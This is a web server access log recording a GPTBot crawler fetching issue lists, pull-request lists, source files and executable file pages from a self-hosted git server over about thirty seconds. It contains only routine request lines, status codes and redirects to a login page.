"/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md?display=source" [Client 74.7.227.38] [Length 123698] [Gzip 7.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" -[17/Feb/2026:18:56:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md?display=source" [Client 74.7.227.38] [Length 123729] [Gzip 7.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" -[17/Feb/2026:18:56:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/index.html?display=source" [Client 74.7.227.38] [Length 21823] [Gzip 6.72] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/index.html" -[17/Feb/2026:18:56:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?project=-1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10030] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?sort=leastupdate&state=closed&type=all" -[17/Feb/2026:18:56:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?labels=0&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10013] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?labels=0&sort=oldest&state=all&type=all" -[17/Feb/2026:18:56:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?milestone=-1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 9999] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?sort=leastupdate&state=open&type=all" -[17/Feb/2026:18:56:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10166] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=1&sort=oldest&state=all&type=all" -[17/Feb/2026:18:56:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?project=-1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10034] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?sort=leastupdate&state=closed&type=all" -[17/Feb/2026:18:56:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?milestone=-1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10001] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?sort=nearduedate&state=open&type=all" -[17/Feb/2026:18:56:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10011] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?sort=oldest&state=closed&type=all" -[17/Feb/2026:18:56:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?labels=0&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 9994] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?sort=farduedate&state=open&type=all" -[17/Feb/2026:18:56:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?labels=0&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10201] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?sort=oldest&state=closed&type=all" -[17/Feb/2026:18:56:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 9976] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=1&state=open&type=all" -[17/Feb/2026:18:56:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10163] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=1&state=open&type=all" -[17/Feb/2026:18:56:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?milestone=-1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10003] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?sort=nearduedate&state=open&type=all" -[17/Feb/2026:18:56:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?project=-1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10000] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?sort=nearduedate&state=closed&type=all" -[17/Feb/2026:18:56:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?labels=0&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10204] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?sort=oldest&state=closed&type=all" -[17/Feb/2026:18:56:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?milestone=-1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 9996] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?sort=leastupdate&state=open&type=all" -[17/Feb/2026:18:56:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?project=-1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10169] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?sort=recentupdate&state=open&type=all" -[17/Feb/2026:18:56:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?labels=0&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10017] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?sort=oldest&state=closed&type=all" -[17/Feb/2026:18:56:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 9975] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&sort=oldest&state=all&type=all" -[17/Feb/2026:18:56:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 9948] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?sort=farduedate&state=all&type=all" -[17/Feb/2026:18:56:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?labels=0&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10180] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?sort=leastupdate&state=all&type=all" -[17/Feb/2026:18:56:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?labels=0&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 10173] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?sort=nearduedate&state=all&type=all" -[17/Feb/2026:18:56:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?labels=0&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10179] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?sort=leastcomment&state=all&type=all" -[17/Feb/2026:18:56:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 10163] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?sort=farduedate&state=all&type=all" -[17/Feb/2026:18:56:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 9974] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?sort=mostcomment&state=all&type=all" -[17/Feb/2026:18:56:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 9984] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?sort=leastupdate&state=all&type=all" -[17/Feb/2026:18:56:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 9947] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?sort=nearduedate&state=all&type=all" -[17/Feb/2026:18:56:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?labels=0&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 9984] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?labels=0&sort=nearduedate&state=all&type=all" -[17/Feb/2026:18:56:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?labels=0&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 9987] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?labels=0&sort=nearduedate&state=all&type=all" -[17/Feb/2026:18:56:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?labels=0&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10178] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?sort=recentupdate&state=all&type=all" -[17/Feb/2026:18:56:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?labels=0&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10172] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?sort=mostcomment&state=all&type=all" -[17/Feb/2026:18:56:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldPilot/dist" [Client 74.7.227.38] [Length 10186] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot" -[17/Feb/2026:18:56:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&state=closed&type=all" [Client 74.7.227.38] [Length 10220] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&project=-1&state=closed&type=all" -[17/Feb/2026:18:56:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&milestone=-1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10037] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&milestone=-1&sort=leastcomment&state=closed&type=all" -[17/Feb/2026:18:56:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&project=-1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10218] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?project=-1&sort=oldest&state=closed&type=all" -[17/Feb/2026:18:56:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&milestone=-1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10198] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&milestone=-1&sort=leastcomment&state=open&type=all" -[17/Feb/2026:18:56:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&milestone=-1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10034] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?milestone=-1&sort=oldest&state=open&type=all" -[17/Feb/2026:18:56:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&milestone=-1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10039] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28any%29&milestone=-1&state=closed&type=all" -[17/Feb/2026:18:56:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&milestone=-1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10201] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28any%29&milestone=-1&state=open&type=all" -[17/Feb/2026:18:56:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&project=-1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10219] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28none%29&project=-1&state=closed&type=all" -[17/Feb/2026:18:56:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&project=-1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10050] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28none%29&project=-1&sort=oldest&state=all&type=all" -[17/Feb/2026:18:56:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&milestone=-1&project=-1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10203] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=1&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:18:56:28 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/GoldPilot/dist" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/dist" -[17/Feb/2026:18:56:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/GoldPilot/dist" -[17/Feb/2026:18:56:29 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_upload/main/GoldPilot/dist" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/dist" -[17/Feb/2026:18:56:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_upload/main/GoldPilot/dist" -[17/Feb/2026:18:56:30 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/GoldPilot/dist" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/dist" -[17/Feb/2026:18:56:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/GoldPilot/dist" -[17/Feb/2026:18:56:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldPilot/dist/GoldMonitor.exe" [Client 74.7.227.38] [Length 11057] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/dist" -[17/Feb/2026:18:56:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldPilot/dist/AssetPilot.exe" [Client 74.7.227.38] [Length 11058] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/dist" -[17/Feb/2026:18:56:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?labels=0&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10026] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?sort=leastupdate&state=closed&type=all" -[17/Feb/2026:18:56:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?labels=0&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 9991] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?sort=farduedate&state=closed&type=all" -[17/Feb/2026:18:56:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 9989] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?sort=leastupdate&state=open&type=all" -[17/Feb/2026:18:56:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?labels=0&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10158] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?sort=leastupdate&state=open&type=all" -[17/Feb/2026:18:56:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?labels=0&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10161] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?sort=leastupdate&state=open&type=all" -[17/Feb/2026:18:56:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?labels=0&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 9992] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?sort=nearduedate&state=closed&type=all" -[17/Feb/2026:18:56:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?labels=0&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 9981] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?sort=recentupdate&state=open&type=all" -[17/Feb/2026:18:56:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10175] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?sort=farduedate&state=open&type=all" -[17/Feb/2026:18:56:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?labels=0&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 9993] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?sort=nearduedate&state=open&type=all" -[17/Feb/2026:18:56:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/GoldPilot/dist/GoldMonitor.exe" [Client 74.7.227.38] [Length 9794] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 